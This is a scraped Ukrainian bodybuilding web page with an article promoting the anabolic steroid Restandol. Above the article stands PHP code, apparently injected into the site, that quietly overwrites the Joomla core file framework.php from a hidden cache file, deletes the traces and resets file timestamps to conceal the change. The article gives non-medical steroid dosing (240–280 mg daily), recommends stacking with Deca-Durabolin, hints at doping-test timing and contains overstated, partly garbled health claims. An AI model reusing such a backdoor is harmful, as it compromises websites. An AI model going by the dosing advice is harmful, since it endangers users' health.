$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Рестандол | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Рестандол

РестандолРестандол - один з небагатьох нових стероїдів, які з'явилися в останні роки. На відміну від більшості анаболічних стероїдів, які вийшли на ринок ще в 50-60-ті роки (а частково вже встигли і зникнути), Рестандол існує всього лише з початку 80-х. Ця обставина, ймовірно, є поясненням того, чому Рестандол займає серед стероїдів особливе місце. Це - революційний стероїд, тому що поряд з метилтестостероном є єдиним оральнодіючим препаратом тестостерону. Сам тестостерон при оральному прийомі абсолютно недієвий, тому що резервується через портальну вену і швидко деактивується в печінці. Діюча хімічна речовина, яка міститься у Рестандолі, тестостеронундеканоат всмоктується через кишечник і в обхід печінки надходить в лімфатичну систему, так що цей препарат дієвий при оральному застосуванні. При цьому не виявляється ні найменшого впливу на функцію печінки. Тестостеронундеканоат - це складний ефір жирної кислоти натурального андроген - тестостерону і перетворюється в організмі людини здебільшого в дігідротестерон, продукт метаболізму тестостерону. Тому Рестандол лише мінімально ароматизований, тобто тільки незначна частина цієї речовини може перетворюватися на естрогени, оскільки дігідротестерон НЕ ароматизований. Тому Рестандол не виявляє у тих, хто його приймає явищ фемінізації, таких наприклад: як гінекомастія або підвищене утворення і накопичення жиру. Тому це бажана альтернатива для атлетів, у яких виникають проблеми зі звичайними ін'єкційними препаратами тестостерону. На цій підставі Рестандол годиться для підготовки до змагань. Друга перевага - неароматизованість Рестандолу - дає можливість організму не відчувати впливу стероїду на власну репродукцію гормону, що трапляється лише у випадках тривалого лікування високими дозами. Оскільки Рестандол дуже швидко виводиться організмом, це слід враховувати при змаганнях з допінг-контролем. Жінки повинні уникати використання Рестандолу, тому що андрогенні компоненти - як і взагалі у всіх тестостеронів - дуже сильно проявляються в організмі при прийомі цього препарату. При його використанні іноді виникають явища підвищеного кров'яного тиску, скупчення рідини в організмі, акне, суперсексуальності і у жінок все це призводить до явищ маскулінізаціі. Рестандол слід зберігати в прохолодному місці (від 6 до 15 градусів) краще в холодильнику. Оскільки капсули дуже чутливі до впливу тепла, то при попаданні на них прямих сонячних променів, наприклад, в машині, ці капсули швидко можуть розтанути і перетворитися на невизначеної форми масу. Внаслідок його незвичайної форми випуску, Рестандол дуже важко підробити. Оригінальний тестостеронундеканоут випускається в маленьких, овальної форми червоних капсулах.

Рестандол можна вважати головним оральним препарат для обережних атлетів, які вже мають досвід застосування ін'єкційного тестостерону і знають про його численні побічні явища, і для літніх атлетів. Той, хто приймає його в дозах менших, ніж 240 - 280 мг на день, буде розчарований його дією. Велика перевага Рестандолу - його добра переносимість. Він може, наприклад, довго застосовуватися в поєднанні з Дека - дураболіном і в цій комбінації він є альтернативою знаменитому поєднанню Діанабол - Дека - дураболін, особливо для спортсменів, які свідомо ставляться до свого здоров'я. Теоретично Рестандол так само швидко і надійно нарощує силу і масу, у поєднанні зі знаменитим накопиченням води, як і ін'єкційні Тестостерон сустанон 250 і Тестостерон тривалої дії, які вже добре зарекомендували себе. Але на жаль це не той випадок. Атлети, які бажають під час підготовки до змагань зібрати занадто багато води за допомогою ін'єкційних тестостеронів тривалої дії і виглядати гладким і пружним, не відмовляючись від "тіста", мали б щонайменше не мати естрогенно-обумовлених проблем при дозуванні до 240 мг Рестандолу вдень і не мати редукції в ретенції води. У цій фразі необхідно, тримати вміст естрогену на якомога нижчому рівні, оскільки інакше будь-яка найкраща дієта виявиться марною. Застосування Рестандолу на цьому етапі має сенс і приносить, як правило, прийнятні результати. В іншому випадку Рестандол - мабуть, швидше засіб для любителів-культуристів.
 
Статті СТЕРОЇДИ Рестандол